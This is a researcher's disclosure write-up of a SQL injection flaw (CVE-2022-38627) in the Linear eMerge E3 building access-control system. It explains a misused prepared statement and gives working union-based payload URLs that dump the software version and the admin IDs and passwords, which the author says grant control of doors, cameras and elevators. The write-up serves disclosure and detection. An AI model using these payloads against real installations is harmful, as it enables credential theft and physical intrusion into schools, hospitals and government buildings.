Introduction:

In this research, I will show you how I managed to find this critical 0-day that allows me to control the entire enterprise building (doors, cameras, elevators, etc… ) in addition to that, I can collect employee data and add new employees who have permission to access the enterprise building, all of this is besides to the natural impact of a critical SQL injection vulnerability

Actually, in this research, you will see the implementation of hacking movies scenes but a real-life scenario

Summary of Linear eMerge E3 Series product:

The Linear eMerge E3 Series is one of the industry leading products in building management systems as it is one of the most widely used products in the industry which is used for control

• School Districts and Campuses (K12 & Higher Ed)
• Corporate Campuses
• State/Local Government buildings (Civic Centers, City Hall, Police Stations, Jails, etc.)
• Public Utilities
• Transportation (Airports, Subway, Bus Depots)
• Places of Worship (Churches, Mega-Church campuses)
• Medical Facilities (Hospitals, Pharma, Bio Labs, etc.)
• And more

Let’s start the Static-Analysis:

I came across this endpoint /badging/badge_template_print.php so let’s take a look at the code

As you can see the developers take user input through the “idt” parameter and then pass it to the query using prepare statement which should prevent the SQL Injection

but wait a minute there is a wrong implementation of prepare statement here and to know what has gone wrong we need to understand what are (the prepare statement workflow) first

The prepared statement processing workflow passes through 7 phases

simply it passes the query to the database like this

$sth = $db->prepare(“SELECT * FROM “.dbtable.” where No = ?”);

as the question mark is called a parameter placeholder

So what happens under the prepared statement is that the query will be passed through 7 phases:

1- Parsing Phase: parsed for Syntax errors and misspelling checks to ensure the validity of the SQL query then

2- Semantics Check Phase: The Database Management System (DBMS) establishes the validity of the query. Does the specified columns and table exist? Does the user have privileges to execute this query?

3- Binding Phase: the database engine detects the placeholders, and the query is compiled with placeholders. The user-supplied data will be added later at (Placeholder replacement phase like this).

$sth->bindValue(1, $id, PDO::PARAM_INT);

4- Query Optimization Phase: The DBMS chooses the best algorithm for executing the query.

5- Cache Phase: The best algorithm is saved in the cache, so the next time when the same query is executed it will skip the first four phases and jump straight to the Placeholder replacement phase

6- Placeholder Replacement Phases: at this phase, the placeholders are replaced with the user’s data. However, the query is already pre-compiled (Binding), so the final query will not go through the compilation phase again. For this reason, the user-provided data will always be interpreted as a simple string and cannot modify the original query’s logic. which makes the query will be immune to SQL Injection vulnerabilities for that data.

7- Execution Phase:

$sth->execute();

then finally the query executed successfully

These are the phases that prepared statements pass through to prevent the SQL injection

So let’s retake a look at what happened here

the developer Put the $id parameter that comes from the user into the prepared statement and not bind Value as I have described above so if the user input parameter is something like that

?id=1 UNION SELECT * FROM User

then the $sth variable value will be like that

$db->prepare(“SELECT * FROM User where No=1 UNION SELECT * FROM User”)

so the prepared statement will take our input as part of the query (not considering it a bind value) and the user input will be passed through all Phases from Phase one which mean that the user input will be considered part of the query as the SQL compiler will compile it as a part of the query and will not be considered as a bind value because it passed in Query from the first phase, not at the sixth phases(placeholder replacement) and which will lead to successfully SQLI

$xml variable is load XML file by using the parameter “tpl”

First “if statement” forces us to load an XML file that contains <picture> tag anyway developers created this XML file “aa.xml” for that, so all we need to do is just put the file name in the “tpl” parameter ?tpl=aa.xml

The second “if statement” we need to make it false to execute else that will print the “ImageFile” column in the page to extract the database content

So in our exploitation, we need to concatenate the output on the ImageFile column as this is the possible way to extract the database

Exploitation:

As I have already access to the source code and database so I know that The ImageFile column was column number 12 out of 39 columns on the “User” table so we don’t need to exploit it as we exploit black-box SQL Injection

So we will exploit it using union-based payload so we will need to concatenate the output at column 12 and define the other 38 columns with a NULL value

/badging/badge_template_print.php?tpl=aa.xml&idt=1337 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ SWVersion:’||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from version

the output will be the software version from the version table so I have concatenated the output at column 12 which will make the output look like that

SWVersion:<software version will be printed here>

What about extracting admin credentials

/badging/badge_template_print.php?tpl=aa.xml&idt=1337 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ Admin-ID-is:’||id||’%20Admin-Password-is:’||password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from controller

After getting the admin credentials i can log in with them to control the whole enterprise building from the web dashboard

Automation:

For detection of the vulnerability, I made this nuclei template to scan your bug bounty programs or your enterprise assets

You can find it on my Security Research Repository :

https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627

┌──(omar㉿kali)-[~]
└─$ nuclei -t CVE-2022–38627.yaml -l subdomains.txt

At this point, we just reached the end so I hope you guys enjoyed

Twitter: @OmarHashem666

Linkedin: https://www.linkedin.com/in/omar-1-hashem

Youtube: https://www.youtube.com/@omarhashem7351